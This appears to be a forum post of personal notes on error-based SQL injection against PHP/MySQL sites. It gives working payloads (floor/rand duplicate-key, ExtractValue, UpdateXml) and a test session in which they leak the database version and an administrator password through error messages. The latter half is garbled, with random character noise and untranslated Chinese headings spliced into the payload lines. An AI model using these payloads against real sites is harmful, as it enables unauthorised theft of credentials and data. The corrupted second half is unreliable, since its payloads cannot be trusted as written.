Posting some of my old notes. When MySQL executes a statement it throws an error message, and PHP+MySQL sites often display that error text on the page, so specific data can be retrieved by constructing the following three kinds of statements.
Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor
The following statements can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked through the error. To retrieve other data, replace the version() expression with a different subquery.
For example, to retrieve the administrator username and password:
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
, G* h8 M0 g7 r# \% B: Q( O; e2、ExtractValue
4 J. O; W, @- J( Y/ u9 \2 W0 F测试语句如下
+ R1 |# E# |6 {8 L/ K ' ]% B( L5 g* E% b; o5 Q9 g
" s3 E, W7 Q) w
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));. _" \2 C+ N* t: l% A* P6 B
实际测试过程8 i6 E% ] X- n& k) y0 U+ ], @
" _: h1 s( B# T$ j2 d
- C. i3 M2 D& V3 L4 g2 T8 umysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,+ T! C" J4 Q d' s% p
(select pass from admin limit 1)));--& d D) l, }4 Y7 L& \
ERROR 1105 (HY000): XPATH syntax error: '\admin888': `- [- N a$ Y
3、UpdateXml1 g7 u: [/ A, S/ r% m$ C; M8 K) `
测试语句
( _4 D3 q; t7 Q) w2 g! u* ?
4 |' X1 [& [- [$ K$ ^8 d6 T: R + M, q/ c8 w0 J& }& J5 g: Z9 i
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))& b. v: F0 @$ b3 e4 m; E% X
实际测试过程
4 H$ |5 _% W4 X3 p " {4 t9 G/ h, A u* v
% j" W6 U) L5 `# Q% }8 ?4 ^
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,. H1 p. ]; o& [- g- P
(select pass from admin limit 1),0x5e24),1));
9 K$ g& }! U o6 s& G! SERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
, X& F8 V2 @- g3 \; U7 QAll, thanks foreign guys.5 }8 h. `9 y, M8 @1 R- U